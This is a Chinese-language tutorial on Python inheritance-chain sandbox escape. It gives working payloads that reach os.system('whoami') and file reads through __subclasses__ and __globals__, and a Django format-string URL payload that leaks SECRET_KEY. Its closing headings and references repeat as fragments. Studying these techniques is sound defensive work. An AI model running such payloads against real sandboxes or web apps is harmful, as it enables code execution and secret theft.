Python继承链利用技术详解<\/h1>

前言<\/h2>
继承链是利用Python对象继承关系进行沙盒逃逸和安全漏洞利用的技术。本文详细介绍了Python继承链的基本概念、核心方法和实际应用场景。<\/p>

基础知识<\/h2>

__bases__<\/code>属性<\/h3>
返回一个类直接继承的父类（以元组形式）：<\/p>
class<\/span> Base1<\/span>: pass<\/span>
<\/span><\/span>class<\/span> Base2<\/span>: pass<\/span>
<\/span><\/span>class<\/span> Test<\/span>(Base1, Base2): pass<\/span>
<\/span><\/span>class<\/span> Test2<\/span>(Test): pass<\/span>
<\/span><\/span>
<\/span><\/span>print(Test.<\/span>__bases__)  # (<class '__main__.Base1'>, <class '__main__.Base2'>)<\/span>
<\/span><\/span>print(Test2.<\/span>__bases__)  # (<class '__main__.Test'>,)<\/span>
<\/span><\/span><\/code><\/pre>__mro__<\/code>属性与__bases__<\/code>类似，但包含完整的继承顺序链。<\/p>
__class__<\/code>属性<\/h3>
返回一个实例所属的类：<\/p>
obj =<\/span> Base1()
<\/span><\/span>print(obj.<\/span>__class__)  # <class '__main__.Base1'><\/span>
<\/span><\/span><\/code><\/pre>__globals__<\/code>属性<\/h3>
返回函数所在命名空间的全局变量字典：<\/p>
import<\/span> os
<\/span><\/span>var =<\/span> 2333<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> func<\/span>(): pass<\/span>
<\/span><\/span>
<\/span><\/span>print(func.<\/span>__globals__)  # 包含os模块和var变量<\/span>
<\/span><\/span><\/code><\/pre>__subclasses__()<\/code>方法<\/h3>
获取一个类的所有子类（返回列表）：<\/p>
class<\/span> Base1<\/span>(object): pass<\/span>
<\/span><\/span>class<\/span> Test<\/span>(Base1): pass<\/span>
<\/span><\/span>
<\/span><\/span>print(Base1.<\/span>__subclasses__())  # [<class '__main__.Test'>]<\/span>
<\/span><\/span><\/code><\/pre>__builtin__<\/code>与__builtins__<\/code><\/h3>

__builtins__<\/code>包含Python内置函数和异常<\/li>
Python2中__builtins__<\/code>指向__builtin__<\/code>模块<\/li>
Python3中改为builtins<\/code>模块<\/li>
<\/ul>
继承链构造方法<\/h2>
基本构造思路：<\/p>

获取任意内置类对象的类<\/li>
获取其基类（通常是object<\/code>）<\/li>
获取所有子类列表<\/li>
在子类中寻找可利用的类<\/li>
<\/ol>
通用构造方式<\/h3>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()
<\/span><\/span># 或<\/span>
<\/span><\/span>().<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()
<\/span><\/span><\/code><\/pre>实际利用方法<\/h2>
方法一：利用file对象读取文件（仅Python2）<\/h3>

查找file类在子类列表中的位置：<\/li>
<\/ol>
search =<\/span> 'file'<\/span>
<\/span><\/span>num =<\/span> 0<\/span>
<\/span><\/span>for<\/span> i in<\/span> ().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__():
<\/span><\/span>    if<\/span> 'file'<\/span> in<\/span> str(i):
<\/span><\/span>        print(num)
<\/span><\/span>    num +=<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre>
通常file<\/code>类在第40位：<\/li>
<\/ol>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[40<\/span>]('filename'<\/span>).<\/span>readlines()
<\/span><\/span><\/code><\/pre>方法二：利用内置模块执行命令（Python2）<\/h3>

查找包含os<\/code>模块的子类：<\/li>
<\/ol>
search =<\/span> 'os'<\/span>
<\/span><\/span>num =<\/span> -<\/span>1<\/span>
<\/span><\/span>for<\/span> i in<\/span> ().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__():
<\/span><\/span>    num +=<\/span> 1<\/span>
<\/span><\/span>    try<\/span>:
<\/span><\/span>        if<\/span> search in<\/span> i.<\/span>__init__.<\/span>__globals__.<\/span>keys():
<\/span><\/span>            print(i, num)
<\/span><\/span>    except<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>

常见可利用类：<\/p>

<class 'site._Printer'><\/code> (72)<\/li>
<class 'site.Quitter'><\/code> (77)<\/li>
<\/ul>
<\/li>

执行命令：<\/p>
<\/li>
<\/ol>
().<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[77<\/span>].<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>system('whoami'<\/span>)
<\/span><\/span><\/code><\/pre>方法三：通用方法（Python2\/3）<\/h3>

查找包含__builtins__<\/code>的子类：<\/li>
<\/ol>
search =<\/span> '__builtins__'<\/span>
<\/span><\/span>num =<\/span> -<\/span>1<\/span>
<\/span><\/span>for<\/span> i in<\/span> ().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__():
<\/span><\/span>    num +=<\/span> 1<\/span>
<\/span><\/span>    try<\/span>:
<\/span><\/span>        if<\/span> search in<\/span> i.<\/span>__init__.<\/span>__globals__.<\/span>keys():
<\/span><\/span>            print(i, num)
<\/span><\/span>    except<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span><\/code><\/pre>
Python3示例（第64位）：<\/li>
<\/ol>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[64<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("__import__('os').system('whoami')"<\/span>)
<\/span><\/span><\/code><\/pre>
Python2示例（第59位）：<\/li>
<\/ol>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("__import__('os').system('whoami')"<\/span>)
<\/span><\/span><\/code><\/pre>Django配置信息泄露实战<\/h2>
利用格式化字符串漏洞读取Django配置信息：<\/p>
漏洞代码示例<\/h3>
from<\/span> django.http import<\/span> HttpResponse
<\/span><\/span>
<\/span><\/span>def<\/span> search<\/span>(request):
<\/span><\/span>    template =<\/span> 'Hello <\/span>{user}<\/span>, This is your search: '<\/span> +<\/span> request.<\/span>GET.<\/span>get('keyword'<\/span>)
<\/span><\/span>    return<\/span> HttpResponse(template.<\/span>format(user=<\/span>request.<\/span>user))
<\/span><\/span><\/code><\/pre>继承链分析<\/h3>

未登录用户是AnonymousUser<\/code>实例<\/li>
AnonymousUser._groups<\/code>是EmptyManager<\/code>对象<\/li>
EmptyManager<\/code>继承自Manager<\/code><\/li>
Manager<\/code>使用QuerySet<\/code>类<\/li>
QuerySet<\/code>导入django.conf.settings<\/code><\/li>
<\/ol>
构造Payload<\/h3>
http:\/\/127.0.0.1:8000\/search?keyword={user._groups.__class__.__base__.__init__.__globals__[QuerySet].__init__.__globals__[settings].SECRET_KEY}
<\/code><\/pre>
总结<\/h2>
Python继承链利用技术要点：<\/p>

掌握__class__<\/code>、__bases__<\/code>、__subclasses__()<\/code>等关键属性方法<\/li>
熟悉Python对象继承关系<\/li>
了解__globals__<\/code>和__builtins__<\/code>的作用<\/li>
针对不同环境（Python2\/3）调整利用方式<\/li>
在Web框架中寻找可利用的对象链<\/li>
<\/ol>
参考资源<\/h2>

关于Python-sec的一些总结<\/a><\/li>
Python eval and bypass sandbox study<\/a><\/li>
Python string format vulnerability<\/a><\/li>
<\/ol>

Python继承链利用技术详解<\/h1>

前言<\/h2> 继承链是利用Python对象继承关系进行沙盒逃逸和安全漏洞利用的技术。本文详细介绍了Python继承链的基本概念、核心方法和实际应用场景。<\/p>

基础知识<\/h2>

实际利用方法<\/h2>

Django配置信息泄露实战<\/h2> 利用格式化字符串漏洞读取Django配置信息：<\/p>

参考资源<\/h2> 关于Python-sec的一些总结<\/a><\/li> Python eval and bypass sandbox study<\/a><\/li> Python string format vulnerability<\/a><\/li> <\/ol>

前言<\/h2>
继承链是利用Python对象继承关系进行沙盒逃逸和安全漏洞利用的技术。本文详细介绍了Python继承链的基本概念、核心方法和实际应用场景。<\/p>

Django配置信息泄露实战<\/h2>
利用格式化字符串漏洞读取Django配置信息：<\/p>

参考资源<\/h2>

关于Python-sec的一些总结<\/a><\/li>
Python eval and bypass sandbox study<\/a><\/li>
Python string format vulnerability<\/a><\/li> <\/ol>